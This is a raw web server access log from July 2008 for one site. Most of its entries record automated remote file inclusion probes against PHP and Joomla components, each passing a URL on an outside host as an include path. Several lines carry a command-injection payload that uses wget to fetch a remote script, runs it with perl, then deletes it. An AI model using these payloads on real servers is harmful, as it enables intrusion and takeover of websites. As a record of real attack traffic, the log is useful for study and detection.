208.180.39.222 - - [06/Jul/2008:11:25:48 -0700] "GET /logs//index.php?main=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:26:03 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:26:04 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:26:09 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:26:20 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:26:24 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.112 - - [06/Jul/2008:11:26:52 -0700] "GET /logs/access_071218.log HTTP/1.0" 200 141071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:26:53 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:26:54 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:27:00 -0700] "GET /logs/access_080215.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:27:01 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:27:01 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:27:09 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.89.162 - - [06/Jul/2008:11:27:19 -0700] "GET //index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 200 18425 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:27:21 -0700] "GET /logs/access_080421.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:27:21 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:27:23 -0700] "GET /logs/access_080215.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:27:23 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:27:23 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:27:24 -0700] "GET /logs/access_080121.log//includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:27:26 -0700] "GET //includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:27:26 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:27:27 -0700] "GET /logs//includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:27:29 -0700] "GET /logs/access_080329.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [06/Jul/2008:11:27:38 -0700] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://messi30.ovh.org/pollphp/db/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [06/Jul/2008:11:27:38 -0700] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://messi30.ovh.org/pollphp/db/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [06/Jul/2008:11:27:39 -0700] "GET /logs/access_080108.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://messi30.ovh.org/pollphp/db/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:27:54 -0700] "GET /logs/access_080329.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.28.69.222 - - [06/Jul/2008:11:28:21 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://beusix.net/cmd.gif?&cmd=id;wget%20www.sadeca.com/d.jpg%20-O%20/tmp/d.jpg;perl%20/tmp/d.jpg;http://beusix.net/cmd.gif?&cmd=id;wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.jpg;perl%20/tmp/d.jpg;rm%20-rf%20/tmp/d.jpg HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.17.22 - - [06/Jul/2008:11:28:22 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-learning.globalfree.net/ispo/bauu/pr0t/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
195.28.69.222 - - [06/Jul/2008:11:28:22 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://beusix.net/cmd.gif?&cmd=id;wget%20www.sadeca.com/d.jpg%20-O%20/tmp/d.jpg;perl%20/tmp/d.jpg;http://beusix.net/cmd.gif?&cmd=id;wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.jpg;perl%20/tmp/d.jpg;rm%20-rf%20/tmp/d.jpg HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.17.22 - - [06/Jul/2008:11:28:22 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-learning.globalfree.net/ispo/bauu/pr0t/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:28:26 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:28:26 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [06/Jul/2008:11:28:32 -0700] "GET /logs/access_080228.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://messi30.ovh.org/pollphp/db/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.86 - - [06/Jul/2008:11:28:54 -0700] "GET //index.php?seccion=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 200 18425 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:28:59 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:28:59 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:28:59 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:28:59 -0700] "GET /logs/access_071224.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:29:01 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:29:01 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:29:01 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:29:02 -0700] "GET /logs/access_071224.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.60.55 - - [06/Jul/2008:11:29:05 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [06/Jul/2008:11:29:24 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.iglesialcs.cl/newweb//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [06/Jul/2008:11:29:25 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.iglesialcs.cl/newweb//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:29:36 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:29:36 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:30:44 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:30:54 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:30:54 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:31:07 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:31:15 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:11:31:36 -0700] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:11:31:36 -0700] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:11:32:07 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:11:32:07 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:11:32:08 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:11:32:08 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:11:32:09 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:11:32:09 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:32:19 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:32:19 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:32:19 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:32:19 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:32:20 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:11:32:20 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
196.40.20.82 - - [06/Jul/2008:11:32:55 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.193.196.250 - - [06/Jul/2008:11:33:01 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.196.250 - - [06/Jul/2008:11:33:01 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.196.250 - - [06/Jul/2008:11:33:02 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:33:15 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:11:33:25 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:11:33:25 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:11:33:25 -0700] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:33:50 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.220.40.8 - - [06/Jul/2008:11:34:20 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
195.28.69.222 - - [06/Jul/2008:11:34:30 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://beusix.net/cmd.gif?&cmd=id;wget%20www.sadeca.com/d.jpg%20-O%20/tmp/d.jpg;perl%20/tmp/d.jpg;http://beusix.net/cmd.gif?&cmd=id;wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.jpg;perl%20/tmp/d.jpg;rm%20-rf%20/tmp/d.jpg HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:11:34:40 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:11:34:40 -0700] "GET /logs/access_080315.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:11:34:41 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.83.0.42 - - [06/Jul/2008:11:34:49 -0700] "GET /logs/access_080215.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://queb3.info/cruise/tanii?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.83.0.42 - - [06/Jul/2008:11:34:49 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://queb3.info/cruise/tanii?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.83.0.42 - - [06/Jul/2008:11:34:50 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://queb3.info/cruise/tanii?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.3.32.28 - - [06/Jul/2008:11:34:50 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:11:35:00 -0700] "GET /logs/access_080220.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:35:14 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:35:14 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:35:19 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.239.190.52 - - [06/Jul/2008:11:35:39 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:11:36:25 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:11:36:26 -0700] "GET //components/com_flyspray/startdown.php?file=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:11:36:27 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:11:36:27 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:11:36:37 -0700] "GET /logs/access_080128.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.83.0.42 - - [06/Jul/2008:11:37:09 -0700] "GET /logs/access_080313.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://queb3.info/cruise/tanii?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.60.55 - - [06/Jul/2008:11:37:10 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:11:37:13 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
